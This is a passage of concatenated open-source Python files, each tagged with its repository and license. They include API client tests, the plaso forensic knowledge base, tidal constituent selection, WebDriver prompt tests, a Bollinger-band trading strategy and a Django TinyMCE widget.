if is_string(v):
b = str(b)
v = str(v)
assert b == v
def test_actions_can_retrieve(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('actions/can_retrieve')
beneficiary = self.client.beneficiaries.retrieve(TestActions.beneficiary_id)
assert isinstance(beneficiary, Beneficiary)
assert beneficiary.id == TestActions.beneficiary_id
def test_actions_can_find(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('actions/can_find')
beneficiaries = self.client.beneficiaries.find(
bank_account_holder_name=TestActions.beneficiary_params['bank_account_holder_name']) # noqa
assert beneficiaries
assert len(beneficiaries) >= 1
TestActions.beneficiary_first_id = beneficiaries[0].id
for beneficiary in beneficiaries:
assert isinstance(beneficiary, Beneficiary)
pagination = beneficiaries.pagination
assert pagination.total_entries > 0
assert pagination.current_page == 1
assert pagination.per_page == 25
assert pagination.previous_page == -1
assert pagination.order == 'created_at'
assert pagination.order_asc_desc == 'asc'
def test_actions_can_first(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('actions/can_first')
beneficiary = self.client.beneficiaries.first(
bank_account_holder_name=TestActions.beneficiary_params['bank_account_holder_name']) # noqa
assert isinstance(beneficiary, Beneficiary)
assert beneficiary.id == TestActions.beneficiary_first_id
assert beneficiary.bank_account_holder_name == TestActions.beneficiary_params[ # noqa
'bank_account_holder_name']
def test_actions_can_update(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('actions/can_update')
beneficiary = self.client.beneficiaries.update(
TestActions.beneficiary_id,
bank_account_holder_name="Test Name 2"
)
assert isinstance(beneficiary, Beneficiary)
assert beneficiary.id == TestActions.beneficiary_id
assert beneficiary.bank_account_holder_name == "Test Name 2"
def test_actions_can_delete(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('actions/can_delete')
beneficiary = self.client.beneficiaries.delete(TestActions.beneficiary_id)
assert isinstance(beneficiary, Beneficiary)
assert beneficiary.id == TestActions.beneficiary_id
assert beneficiary.bank_account_holder_name == "Test Name 2"
def test_actions_can_current(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('actions/can_current')
account = self.client.accounts.current()
assert isinstance(account, Account)
assert account.id == '8ec3a69b-02d1-4f09-9a6b-6bd54a61b3a8'
assert account.created_at == '2015-04-24T15:57:55+00:00'
def test_actions_can_validate_beneficiaries(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('actions/can_validate_beneficiaries')
params = {
'bank_country': 'GB',
'currency': 'GBP',
'account_number': TestActions.beneficiary_params['account_number'], # noqa
'routing_code_type_1': TestActions.beneficiary_params['routing_code_type_2'], # noqa
'routing_code_value_1': TestActions.beneficiary_params['routing_code_value_2'], # noqa
'payment_types': ['regular']}
beneficiary = self.client.beneficiaries.validate(**params)
assert isinstance(beneficiary, Beneficiary)
assert beneficiary.account_number == TestActions.beneficiary_params[ # noqa
'account_number']
assert 'regular' in beneficiary.payment_types
def test_actions_can_use_currency_to_retrieve_balance(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette(
'actions/can_use_currency_to_retrieve_balance')
balance = self.client.balances.for_currency('GBP')
assert isinstance(balance, Balance)
assert balance.id
| CurrencyCloud/currencycloud-python | tests/integration/test_actions.py | Python | mit | 7,051 |
# -*- coding: utf-8 -*-
"""The artifact knowledge base object.
The knowledge base is filled by user provided input and the pre-processing
phase. It is intended to provide successive phases, like the parsing and
analysis phases, with essential information like the timezone and codepage
of the source data.
"""
from __future__ import unicode_literals
import codecs
import os
from plaso.containers import artifacts
from plaso.engine import logger
import pytz # pylint: disable=wrong-import-order
class KnowledgeBase(object):
"""The knowledge base."""
_DEFAULT_ACTIVE_SESSION = '00000000000000000000000000000000'
def __init__(self):
"""Initializes a knowledge base."""
super(KnowledgeBase, self).__init__()
self._active_session = self._DEFAULT_ACTIVE_SESSION
self._available_time_zones = {}
self._codepage = 'cp1252'
self._environment_variables = {}
self._hostnames = {}
self._mount_path = None
self._text_prepend = None
self._time_zone = pytz.UTC
self._user_accounts = {}
self._values = {}
@property
def available_time_zones(self):
"""list[TimeZone]: available time zones of the current session."""
return self._available_time_zones.get(self._active_session, {}).values()
@property
def codepage(self):
"""str: codepage of the current session."""
return self.GetValue('codepage', default_value=self._codepage)
@property
def hostname(self):
"""str: hostname of the current session."""
hostname_artifact = self._hostnames.get(self._active_session, None)
if not hostname_artifact:
return ''
return hostname_artifact.name or ''
@property
def timezone(self):
"""datetime.tzinfo: timezone of the current session."""
return self._time_zone
@property
def user_accounts(self):
"""list[UserAccountArtifact]: user accounts of the current session."""
return self._user_accounts.get(self._active_session, {}).values()
@property
def year(self):
"""int: year of the current session."""
return self.GetValue('year', default_value=0)
def AddAvailableTimeZone(self, time_zone, session_identifier=None):
"""Adds an available time zone.
Args:
time_zone (TimeZoneArtifact): time zone artifact.
session_identifier (Optional[str])): session identifier, where
None represents the active session.
Raises:
KeyError: if the time zone already exists.
"""
session_identifier = session_identifier or self._active_session
if session_identifier not in self._available_time_zones:
self._available_time_zones[session_identifier] = {}
available_time_zones = self._available_time_zones[session_identifier]
if time_zone.name in available_time_zones:
raise KeyError('Time zone: {0:s} already exists.'.format(time_zone.name))
available_time_zones[time_zone.name] = time_zone
def AddUserAccount(self, user_account, session_identifier=None):
"""Adds an user account.
Args:
user_account (UserAccountArtifact): user account artifact.
session_identifier (Optional[str])): session identifier, where
None represents the active session.
Raises:
KeyError: if the user account already exists.
"""
session_identifier = session_identifier or self._active_session
if session_identifier not in self._user_accounts:
self._user_accounts[session_identifier] = {}
user_accounts = self._user_accounts[session_identifier]
if user_account.identifier in user_accounts:
raise KeyError('User account: {0:s} already exists.'.format(
user_account.identifier))
user_accounts[user_account.identifier] = user_account
def AddEnvironmentVariable(self, environment_variable):
"""Adds an environment variable.
Args:
environment_variable (EnvironmentVariableArtifact): environment variable
artifact.
Raises:
KeyError: if the environment variable already exists.
"""
name = environment_variable.name.upper()
if name in self._environment_variables:
raise KeyError('Environment variable: {0:s} already exists.'.format(
environment_variable.name))
self._environment_variables[name] = environment_variable
def GetEnvironmentVariable(self, name):
"""Retrieves an environment variable.
Args:
name (str): name of the environment variable.
Returns:
EnvironmentVariableArtifact: environment variable artifact or None
if there was no value set for the given name.
"""
name = name.upper()
return self._environment_variables.get(name, None)
def GetEnvironmentVariables(self):
"""Retrieves the environment variables.
Returns:
list[EnvironmentVariableArtifact]: environment variable artifacts.
"""
return self._environment_variables.values()
def GetHostname(self, session_identifier=None):
"""Retrieves the hostname related to the event.
If the hostname is not stored in the event it is determined based
on the preprocessing information that is stored inside the storage file.
Args:
session_identifier (Optional[str])): session identifier, where
None represents the active session.
Returns:
str: hostname.
"""
session_identifier = session_identifier or self._active_session
hostname_artifact = self._hostnames.get(session_identifier, None)
if not hostname_artifact:
return ''
return hostname_artifact.name or ''
def GetMountPath(self):
"""Retrieves the mount path of the source.
Returns:
str: mount path of the source or None if not set.
"""
return self._mount_path
def GetSourceConfigurationArtifacts(self, session_identifier=None):
"""Retrieves the knowledge base as a source configuration artifacts.
Args:
session_identifier (Optional[str])): session identifier, where
None represents the active session.
Returns:
list[SourceConfigurationArtifact]: source configuration artifacts.
"""
source_configuration = artifacts.SourceConfigurationArtifact()
# TODO: set path_spec
source_configuration.system_configuration = (
self._GetSystemConfigurationArtifact(
session_identifier=session_identifier))
return [source_configuration]
def _GetSystemConfigurationArtifact(self, session_identifier=None):
"""Retrieves the knowledge base as a system configuration artifact.
Args:
session_identifier (Optional[str])): session identifier, where
None represents the active session.
Returns:
SystemConfigurationArtifact: system configuration artifact.
"""
session_identifier = session_identifier or self._active_session
system_configuration = artifacts.SystemConfigurationArtifact()
system_configuration.code_page = self.GetValue(
'codepage', default_value=self._codepage)
system_configuration.hostname = self._hostnames.get(
session_identifier, None)
system_configuration.keyboard_layout = self.GetValue('keyboard_layout')
system_configuration.operating_system = self.GetValue('operating_system')
system_configuration.operating_system_product = self.GetValue(
'operating_system_product')
system_configuration.operating_system_version = self.GetValue(
'operating_system_version')
time_zone = self._time_zone.zone
if isinstance(time_zone, bytes):
time_zone = time_zone.decode('ascii')
system_configuration.time_zone = time_zone
available_time_zones = self._available_time_zones.get(
session_identifier, {})
# In Python 3 dict.values() returns a type dict_values, which will cause
# the JSON serializer to raise a TypeError.
system_configuration.available_time_zones = list(
available_time_zones.values())
user_accounts = self._user_accounts.get(session_identifier, {})
# In Python 3 dict.values() returns a type dict_values, which will cause
# the JSON serializer to raise a TypeError.
system_configuration.user_accounts = list(user_accounts.values())
return system_configuration
def GetTextPrepend(self):
"""Retrieves the text to prepend to the display name.
Returns:
str: text to prepend to the display name or None if not set.
"""
return self._text_prepend
def GetUsernameByIdentifier(
self, user_identifier, session_identifier=None):
"""Retrieves the username based on an user identifier.
Args:
user_identifier (str): user identifier, either a UID or SID.
session_identifier (Optional[str])): session identifier, where
None represents the active session.
Returns:
str: username.
"""
session_identifier = session_identifier or self._active_session
user_accounts = self._user_accounts.get(session_identifier, {})
user_account = user_accounts.get(user_identifier, None)
if not user_account:
return ''
return user_account.username or ''
def GetUsernameForPath(self, path):
"""Retrieves a username for a specific path.
This is determining if a specific path is within a user's directory and
returning the username of the user if so.
Args:
path (str): path.
Returns:
str: username or None if the path does not appear to be within a user's
directory.
"""
path = path.lower()
user_accounts = self._user_accounts.get(self._active_session, {})
for user_account in user_accounts.values():
if not user_account.user_directory:
continue
user_directory = user_account.user_directory.lower()
if path.startswith(user_directory):
return user_account.username
return None
def GetValue(self, identifier, default_value=None):
"""Retrieves a value by identifier.
Args:
identifier (str): case insensitive unique identifier for the value.
default_value (object): default value.
Returns:
object: value or default value if not available.
Raises:
TypeError: if the identifier is not a string type.
"""
if not isinstance(identifier, str):
raise TypeError('Identifier not a string type.')
identifier = identifier.lower()
return self._values.get(identifier, default_value)
def HasUserAccounts(self):
"""Determines if the knowledge base contains user accounts.
Returns:
bool: True if the knowledge base contains user accounts.
"""
return self._user_accounts.get(self._active_session, {}) != {}
def ReadSystemConfigurationArtifact(
self, system_configuration, session_identifier=None):
"""Reads the knowledge base values from a system configuration artifact.
Note that this overwrites existing values in the knowledge base.
Args:
system_configuration (SystemConfigurationArtifact): system configuration
artifact.
session_identifier (Optional[str])): session identifier, where
None represents the active session.
"""
session_identifier = session_identifier or self._active_session
if system_configuration.code_page:
try:
self.SetCodepage(system_configuration.code_page)
except ValueError:
logger.warning(
'Unsupported codepage: {0:s}, defaulting to {1:s}'.format(
system_configuration.code_page, self._codepage))
self._hostnames[session_identifier] = system_configuration.hostname
self.SetValue('keyboard_layout', system_configuration.keyboard_layout)
self.SetValue('operating_system', system_configuration.operating_system)
self.SetValue(
'operating_system_product',
system_configuration.operating_system_product)
self.SetValue(
'operating_system_version',
system_configuration.operating_system_version)
if system_configuration.time_zone:
try:
self.SetTimeZone(system_configuration.time_zone)
except ValueError:
logger.warning(
'Unsupported time zone: {0:s}, defaulting to {1:s}'.format(
system_configuration.time_zone, self.timezone.zone))
self._available_time_zones[session_identifier] = {
time_zone.name: time_zone
for time_zone in system_configuration.available_time_zones}
self._user_accounts[session_identifier] = {
user_account.identifier: user_account
for user_account in system_configuration.user_accounts}
def SetActiveSession(self, session_identifier):
"""Sets the active session.
Args:
session_identifier (str): session identifier where None represents
the default active session.
"""
self._active_session = session_identifier or self._DEFAULT_ACTIVE_SESSION
def SetCodepage(self, codepage):
"""Sets the codepage.
Args:
codepage (str): codepage.
Raises:
ValueError: if the codepage is not supported.
"""
try:
codecs.getencoder(codepage)
self._codepage = codepage
except LookupError:
raise ValueError('Unsupported codepage: {0:s}'.format(codepage))
def SetEnvironmentVariable(self, environment_variable):
"""Sets an environment variable.
Args:
environment_variable (EnvironmentVariableArtifact): environment variable
artifact.
"""
name = environment_variable.name.upper()
self._environment_variables[name] = environment_variable
def SetHostname(self, hostname, session_identifier=None):
"""Sets a hostname.
Args:
hostname (HostnameArtifact): hostname artifact.
session_identifier (Optional[str])): session identifier, where
None represents the active session.
"""
session_identifier = session_identifier or self._active_session
self._hostnames[session_identifier] = hostname
def SetMountPath(self, mount_path):
"""Sets the text to prepend to the display name.
Args:
mount_path (str): mount path of the source or None if the source is
not a mounted onto a directory.
"""
# Remove a trailing path separator from the mount path so the relative
# paths will start with a path separator.
if mount_path and mount_path.endswith(os.sep):
mount_path = mount_path[:-1]
self._mount_path = mount_path
def SetTextPrepend(self, text_prepend):
"""Sets the text to prepend to the display name.
Args:
text_prepend (str): text to prepend to the display name or None if no
text should be prepended.
"""
self._text_prepend = text_prepend
def SetTimeZone(self, time_zone):
"""Sets the time zone.
Args:
time_zone (str): time zone.
Raises:
ValueError: if the timezone is not supported.
"""
try:
self._time_zone = pytz.timezone(time_zone)
except (AttributeError, pytz.UnknownTimeZoneError):
raise ValueError('Unsupported timezone: {0!s}'.format(time_zone))
def SetValue(self, identifier, value):
"""Sets a value by identifier.
Args:
identifier (str): case insensitive unique identifier for the value.
value (object): value.
Raises:
TypeError: if the identifier is not a string type.
"""
if not isinstance(identifier, str):
raise TypeError('Identifier not a string type.')
identifier = identifier.lower()
self._values[identifier] = value
| rgayon/plaso | plaso/engine/knowledge_base.py | Python | apache-2.0 | 15,317 |
import sys
sys.path.append("yam")
sys.path.append("../../yam")
import config, clientapp, threading
import time
from devices import DevicePresenceBroadcaster, Device
from player import LocalPlayer, RemotePlayer
class TestClientApp:
config.setConfigFolder('tests/config/')
clientReceivedBroadcastMsg = False
device = Device(type="remote",visibleName="test-device")
app = None
def test_app_can_watch_devices(self):
global app
app = clientapp.setupTestClient()
app.deviceMan.deleteRegistry()
t = threading.Thread(target=self.send_presence_broadcast_to_device)
t.start()
app.start()
time.sleep(2)
assert self.device in app.deviceMan.getDevices()
app.deviceMan.deleteRegistry()
def send_presence_broadcast_to_device(self):
broadcaster = DevicePresenceBroadcaster(self.device, delayBetweenBroadcastsInSec=1)
broadcaster.start()
time.sleep(5)
broadcaster.stop()
global app
app.stop()
def test_app_can_select_device(self):
global app
app.deviceMan.deleteRegistry()
app.deviceMan.registerLocalDevice()
app.updatePlayer()
assert isinstance(app.player , LocalPlayer)
app.deviceMan.deleteRegistry()
device = Device(type="remote",visibleName="test-client-app", url="localhost:0")
app.deviceMan.registerDevice(device)
app.deviceMan.setActiveDevice(device)
app.updatePlayer()
assert isinstance(app.player, RemotePlayer)
app.stop()
app.deviceMan.deleteRegistry()
def test_app_can_send_request_to_remote_device(self):
global app
def test_app_does_not_leak(self):
pass
| Aleksandre/YAM | tests/unit/test_clientapp.py | Python | mit | 1,536 |
from collections import OrderedDict
import numpy as np
from ._ut_constants import constit_index_dict, ut_constants
from .astronomy import ut_astron
from .utilities import Bunch
def ut_cnstitsel(tref, minres, incnstit, infer):
"""
Select constituents and organize constituent data.
inputs
tref = reference time (UTC, days relative to Python datetime epoch)
minres = freq separation (cph) used in decision tree
incnstit = 'cnstit' input to ut_solv
infer = 'opt.infer' input to ut_solv
outputs
cnstit.NR.name = list of 4-char names of NR constits
cnstit.NR.frq = frequencies (cph) of NR constits
cnstit.NR.lind = list indices (in ut_constants.mat) of NR constits
cnstit.R = empty if no inference; otherwise, for each (i'th) R constit:
cnstit.R[i].name, .frq, .lind = as above, but for R constits
cnstit.R[i].I[j].name, .frq, .lind = as above for j'th I constit
coef.nNR, coef.nR, coef.nI = number non-reference, reference,
inferred constituents
coef.name = list of names of all constituents (NR, R, and I)
coef.aux.frq = frequencies (cph) of all constituents
coef.aux.lind = list indices of all constituents
coef.aux.reftime = tref
"""
shallow = ut_constants.shallow
const = ut_constants.const
cnstit = Bunch()
coef = Bunch()
astro, ader = ut_astron(tref)
ii = np.isfinite(const.ishallow)
const.freq[~ii] = np.dot(const.doodson[~ii, :], ader[:, 0]) / 24
for k in ii.nonzero()[0]:
ik = const.ishallow[k] + np.arange(const.nshallow[k])
ik = ik.astype(int) - 1
const.freq[k] = np.sum(const.freq[shallow.iname[ik] - 1] * shallow.coef[ik])
# cnstit.NR
cnstit["NR"] = Bunch()
# if incnstit.lower() == 'auto':
if incnstit == "auto":
cnstit.NR.lind = np.where(const.df >= minres)[0]
else:
cnstit.NR.lind = [constit_index_dict[n] for n in incnstit]
# Remove from NR any R and I constituents.
if infer is not None:
RIset = set(infer.inferred_names) | set(infer.reference_names)
RI_index_set = {constit_index_dict[n] for n in RIset}
cnstit.NR.lind = [ind for ind in cnstit.NR.lind if ind not in RI_index_set]
cnstit.NR.frq = const.freq[cnstit.NR.lind]
cnstit.NR.name = const.name[cnstit.NR.lind]
nNR = len(cnstit.NR.frq)
# cnstit.R
nR = 0
nI = 0
cnstit.R = []
if infer is not None:
nI = len(infer.inferred_names)
# Find unique reference names
_r = infer.reference_names
allrefs = list(OrderedDict(zip(_r, [1] * len(_r))).keys())
nR = len(allrefs)
for k, name in enumerate(allrefs):
refstruct = Bunch(name=name)
refstruct.lind = constit_index_dict[name]
refstruct.frq = const.freq[refstruct.lind]
ind = [i for i, rname in enumerate(infer.reference_names) if name == rname]
refstruct.nI = len(ind)
refstruct.I = Bunch(Rp=[], Rm=[], name=[], lind=[], frq=[]) # noqa
for lk, ilk in enumerate(ind):
refstruct.I.Rp.append(
infer.amp_ratios[ilk]
* np.exp(1j * infer.phase_offsets[ilk] * np.pi / 180),
)
if len(infer.amp_ratios) > nI:
refstruct.I.Rm.append(
infer.amp_ratios[ilk + nI]
* np.exp(-1j * infer.phase_offsets[ilk + nI] * np.pi / 180),
)
else:
refstruct.I.Rm.append(np.conj(refstruct.I.Rp[lk]))
iname = infer.inferred_names[ilk]
refstruct.I.name.append(iname)
lind = constit_index_dict[iname]
refstruct.I.lind.append(lind)
refstruct.I.frq.append(const.freq[lind])
refstruct.I.Rp = np.array(refstruct.I.Rp)
refstruct.I.Rm = np.array(refstruct.I.Rm)
cnstit.R.append(refstruct)
coef.name = list(cnstit.NR.name[:])
coef.aux = Bunch(
frq=list(cnstit.NR.frq[:]),
lind=list(cnstit.NR.lind[:]),
reftime=tref,
)
if infer is not None:
# Append reference values, and then inferred values, to the lists.
coef.name.extend(allrefs)
coef.aux.frq.extend([_ref.frq for _ref in cnstit.R])
coef.aux.lind.extend([_ref.lind for _ref in cnstit.R])
for ref in cnstit.R:
coef.name.extend(ref.I.name)
coef.aux.frq.extend(ref.I.frq)
coef.aux.lind.extend(ref.I.lind)
coef.name = np.array(coef.name, dtype=object)
coef.aux.frq = np.array(coef.aux.frq, dtype=float)
coef.aux.lind = np.array(coef.aux.lind, dtype=int)
coef.nR = nR
coef.nNR = nNR
coef.nI = nI
return cnstit, coef
| wesleybowman/UTide | utide/constituent_selection.py | Python | mit | 4,849 |
# META: timeout=long
import pytest
from tests.support.asserts import assert_error, assert_success, assert_dialog_handled
from tests.support.inline import inline
def get_element_property(session, element_id, name):
return session.transport.send(
"GET", "session/{session_id}/element/{element_id}/property/{name}".format(
session_id=session.session_id, element_id=element_id, name=name))
@pytest.fixture
def check_user_prompt_closed_without_exception(session, create_dialog):
def check_user_prompt_closed_without_exception(dialog_type, retval):
session.url = inline("<input id=foo>")
element = session.find.css("#foo", all=False)
create_dialog(dialog_type, text=dialog_type)
response = get_element_property(session, element.id, "id")
assert_success(response, "foo")
assert_dialog_handled(session, expected_text=dialog_type, expected_retval=retval)
return check_user_prompt_closed_without_exception
@pytest.fixture
def check_user_prompt_closed_with_exception(session, create_dialog):
def check_user_prompt_closed_with_exception(dialog_type, retval):
session.url = inline("<input id=foo>")
element = session.find.css("#foo", all=False)
create_dialog(dialog_type, text=dialog_type)
response = get_element_property(session, element.id, "id")
assert_error(response, "unexpected alert open")
assert_dialog_handled(session, expected_text=dialog_type, expected_retval=retval)
return check_user_prompt_closed_with_exception
@pytest.fixture
def check_user_prompt_not_closed_but_exception(session, create_dialog):
def check_user_prompt_not_closed_but_exception(dialog_type):
session.url = inline("<input id=foo>")
element = session.find.css("#foo", all=False)
create_dialog(dialog_type, text=dialog_type)
response = get_element_property(session, element.id, "id")
assert_error(response, "unexpected alert open")
assert session.alert.text == dialog_type
session.alert.dismiss()
return check_user_prompt_not_closed_but_exception
@pytest.mark.capabilities({"unhandledPromptBehavior": "accept"})
@pytest.mark.parametrize("dialog_type, retval", [
("alert", None),
("confirm", True),
("prompt", ""),
])
def test_accept(check_user_prompt_closed_without_exception, dialog_type, retval):
check_user_prompt_closed_without_exception(dialog_type, retval)
@pytest.mark.capabilities({"unhandledPromptBehavior": "accept and notify"})
@pytest.mark.parametrize("dialog_type, retval", [
("alert", None),
("confirm", True),
("prompt", ""),
])
def test_accept_and_notify(check_user_prompt_closed_with_exception, dialog_type, retval):
check_user_prompt_closed_with_exception(dialog_type, retval)
@pytest.mark.capabilities({"unhandledPromptBehavior": "dismiss"})
@pytest.mark.parametrize("dialog_type, retval", [
("alert", None),
("confirm", False),
("prompt", None),
])
def test_dismiss(check_user_prompt_closed_without_exception, dialog_type, retval):
check_user_prompt_closed_without_exception(dialog_type, retval)
@pytest.mark.capabilities({"unhandledPromptBehavior": "dismiss and notify"})
@pytest.mark.parametrize("dialog_type, retval", [
("alert", None),
("confirm", False),
("prompt", None),
])
def test_dismiss_and_notify(check_user_prompt_closed_with_exception, dialog_type, retval):
check_user_prompt_closed_with_exception(dialog_type, retval)
@pytest.mark.capabilities({"unhandledPromptBehavior": "ignore"})
@pytest.mark.parametrize("dialog_type", ["alert", "confirm", "prompt"])
def test_ignore(check_user_prompt_not_closed_but_exception, dialog_type):
check_user_prompt_not_closed_but_exception(dialog_type)
@pytest.mark.parametrize("dialog_type, retval", [
("alert", None),
("confirm", False),
("prompt", None),
])
def test_default(check_user_prompt_closed_with_exception, dialog_type, retval):
check_user_prompt_closed_with_exception(dialog_type, retval)
| UK992/servo | tests/wpt/web-platform-tests/webdriver/tests/get_element_property/user_prompts.py | Python | mpl-2.0 | 4,054 |
# -*- coding: utf-8 -*-
import datetime, time, csv, os
from utils.db import SqliteDB
from utils.rwlogging import log
from utils.rwlogging import strategyLogger as logs
from trader import Trader
from indicator import ma, macd, bolling, rsi, kdj
from strategy.pool import StrategyPool
highest = 0
def runStrategy(prices):
logs.info('STRATEGY,BUY TIMES, SELL TIMES, FINAL EQUITY')
#prices = SqliteDB().getAllPrices(table)
ps = [p['close'] for p in prices]
pool = StrategyPool(100)
#doBollingTrade(pool, prices, ps, 12, 2.4)
#pool.showStrategies()
#return
for i in range(2, 40):
j = 0
log.debug(i)
while j <= 5:
doBollingTrade(pool, prices, ps, i, j)
j += 0.1
pool.showStrategies()
def doBollingTrade(pool, prices, ps, period, deviate):
global highest
sname = 'BOLLING_' + str(period) + '_' + str(deviate)
bollings = bolling.calc_bolling(prices, period, deviate)
t = Trader(sname)
for i in range(period, len(prices)):
if ps[i-1] > bollings['lower'][i-1] and ps[i] < bollings['lower'][i] and t.bsflag < 1:
notes = 'LAST p: ' + str(ps[i - 1]) + ';boll lower: ' + str(bollings['lower'][i-1]) + 'CURRENT p: ' + str(ps[i]) + ';boll lower: ' + str(bollings['lower'][i])
t.buy(prices[i]['date'], prices[i]['time'], prices[i]['rmb'], notes)
if ps[i-1] < bollings['mean'][i-1] and ps[i] >= bollings['mean'][i] and t.bsflag == 1:
notes = 'LAST p: ' + str(ps[i - 1]) + ';boll mean: ' + str(bollings['mean'][i-1]) + 'CURRENT p: ' + str(ps[i]) + ';boll mean: ' + str(bollings['mean'][i])
t.buy(prices[i]['date'], prices[i]['time'], prices[i]['rmb'], notes)
if ps[i-1] < bollings['upper'][i-1] and ps[i] > bollings['upper'][i] and t.bsflag > -1:
notes = 'LAST p: ' + str(ps[i - 1]) + ';boll upper: ' + str(bollings['upper'][i-1]) + 'CURRENT p: ' + str(ps[i]) + ';boll upper: ' + str(bollings['upper'][i])
t.sell(prices[i]['date'], prices[i]['time'], prices[i]['rmb'], notes)
if ps[i-1] > bollings['mean'][i-1] and ps[i] <= bollings['mean'][i] and t.bsflag == -1:
notes = 'LAST p: ' + str(ps[i - 1]) + ';boll mean: ' + str(bollings['mean'][i-1]) + 'CURRENT p: ' + str(ps[i]) + ';boll mean: ' + str(bollings['mean'][i])
t.sell(prices[i]['date'], prices[i]['time'], prices[i]['rmb'], notes)
t.show(prices[i]['date'], prices[i]['time'], prices[i]['rmb'])
pool.estimate(t)
| rolandwz/pymisc | utrader/strategy/bollingTrader.py | Python | mit | 2,348 |
#!/usr/bin/python
"""Test of radio button output using Firefox."""
from macaroon.playback import *
import utils
sequence = MacroSequence()
sequence.append(KeyComboAction("<Alt>f"))
sequence.append(KeyComboAction("p"))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("<Alt>a"))
sequence.append(utils.AssertPresentationAction(
"1. Alt a to radio button group",
["BRAILLE LINE: 'Firefox application Print dialog General page tab Range Range &=y All Pages radio button'",
" VISIBLE: '&=y All Pages radio button', cursor=1",
"SPEECH OUTPUT: 'General page tab.'",
"SPEECH OUTPUT: 'Range panel'",
"SPEECH OUTPUT: 'All Pages.'",
"SPEECH OUTPUT: 'selected radio button'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("KP_Enter"))
sequence.append(utils.AssertPresentationAction(
"2. Basic Where Am I",
["BRAILLE LINE: 'Firefox application Print dialog General page tab Range Range &=y All Pages radio button'",
" VISIBLE: '&=y All Pages radio button', cursor=1",
"SPEECH OUTPUT: 'Range.'",
"SPEECH OUTPUT: 'All Pages radio button.'",
"SPEECH OUTPUT: 'selected.'",
"SPEECH OUTPUT: '1 of 4.'",
"SPEECH OUTPUT: 'Alt+A'"]))
sequence.append(KeyComboAction("Escape"))
sequence.append(utils.AssertionSummaryAction())
sequence.start()
| pvagner/orca | test/keystrokes/firefox/ui_role_radio_button.py | Python | lgpl-2.1 | 1,371 |
from django.conf.urls import url
from literature import views
pgsql_qualifier = r"[\w\d_]+"
urlpatterns = [
url(r'^$', views.list_references,),
url(r'^entry/upload/$', views.upload,),
url(r'^entry/(?P<entries_id>\d+)/$', views.show_entry,),
url(r'^entry/add$', views.LiteratureView.as_view(),),
url(r'^entry/(?P<entries_id>\d+)/edit/$', views.LiteratureView.as_view(),),
]
| tom-heimbrodt/oeplatform | literature/urls.py | Python | agpl-3.0 | 396 |
"""
TinyMCE 4 forms widget
This TinyMCE widget was copied and extended from this code by John D'Agostino:
http://code.djangoproject.com/wiki/CustomWidgetsTinyMCE
"""
import json
import logging
from django.conf import settings
from django.contrib.admin import widgets as admin_widgets
from django.forms import Media, Textarea
from django.forms.utils import flatatt
from django.template.loader import render_to_string
from django.urls import reverse
from django.utils.encoding import smart_str
from django.utils.html import escape
from django.utils.safestring import mark_safe
from django.utils.translation import get_language, get_language_bidi
from . import settings as mce_settings
logger = logging.getLogger(__name__)
def get_language_config():
"""
Creates a language configuration for TinyMCE4 based on Django project settings
:return: language- and locale-related parameters for TinyMCE 4
:rtype: dict
"""
config = {"language": get_language()[:2]}
if get_language_bidi():
config["directionality"] = "rtl"
else:
config["directionality"] = "ltr"
if mce_settings.USE_SPELLCHECKER:
from enchant import list_languages
enchant_languages = list_languages()
logger.debug(f"Enchant languages: {enchant_languages}")
lang_names = []
for lang, name in settings.LANGUAGES:
lang = convert_language_code(lang)
if lang not in enchant_languages:
lang = lang[:2]
if lang not in enchant_languages:
logger.error(f"Missing {lang} spellchecker dictionary!")
continue
if config.get("spellchecker_language") is None:
config["spellchecker_language"] = lang
lang_names.append(f"{name}={lang}")
config["spellchecker_languages"] = ",".join(lang_names)
return config
def convert_language_code(django_lang):
"""
Converts Django language codes "ll-cc" into ISO codes "ll_CC" or "ll"
:param django_lang: Django language code as ll-cc
:type django_lang: str
:return: ISO language code as ll_CC
:rtype: str
"""
lang_and_country = django_lang.split("-")
try:
return "_".join((lang_and_country[0], lang_and_country[1].upper()))
except IndexError:
return lang_and_country[0]
def render_tinymce_init_js(mce_config, callbacks, id_=""):
"""
Renders TinyMCE.init() JavaScript code
:param mce_config: TinyMCE 4 configuration
:type mce_config: dict
:param callbacks: TinyMCE callbacks
:type callbacks: dict
:param id_: HTML element's ID to which TinyMCE is attached.
:type id_: str
:return: TinyMCE.init() code
:rtype: str
"""
if mce_settings.USE_SPELLCHECKER and "spellchecker_callback" not in callbacks:
callbacks["spellchecker_callback"] = render_to_string("tinymce/spellchecker.js")
if id_:
mce_config["selector"] = mce_config.get("selector", "textarea") + "#{}".format(
id_
)
mce_json = json.dumps(mce_config, indent=2)
return render_to_string(
"tinymce/tinymce_init.js",
{"callbacks": callbacks, "tinymce_config": mce_json[1:-1]},
)
class TinyMCE(Textarea):
"""
TinyMCE 4 widget
It replaces a textarea form widget with a rich-text WYSIWYG
`TinyMCE 4`_ editor widget.
:param attrs: General Django widget attributes.
:type attrs: dict
:param mce_attrs: Additional configuration parameters for TinyMCE 4.
They *amend* the existing configuration.
:type mce_attrs: dict
:param profile: TinyMCE 4 configuration parameters.
They *replace* the existing configuration.
:type profile: dict
.. _TinyMCE 4: https://www.tinymce.com/
"""
def __init__(self, attrs=None, mce_attrs=None, profile=None):
super().__init__(attrs)
self.mce_attrs = mce_attrs or {}
self.profile = get_language_config()
default_profile = profile or mce_settings.CONFIG.copy()
self.profile.update(default_profile)
def render(self, name, value, attrs=None, renderer=None):
if value is None:
value = ""
value = smart_str(value)
final_attrs = self.build_attrs(attrs)
final_attrs["name"] = name
mce_config = self.profile.copy()
mce_config.update(self.mce_attrs)
if mce_config.get("inline", False):
html = f"<div{flatatt(final_attrs)}>{escape(value)}</div>\n"
else:
html = "<textarea{}>{}</textarea>\n".format(
flatatt(final_attrs), escape(value)
)
html += '<script type="text/javascript">{}</script>'.format(
render_tinymce_init_js(
mce_config, mce_settings.CALLBACKS.copy(), final_attrs["id"]
)
)
return mark_safe(html) # nosec
@property
def media(self):
js = [mce_settings.JS_URL]
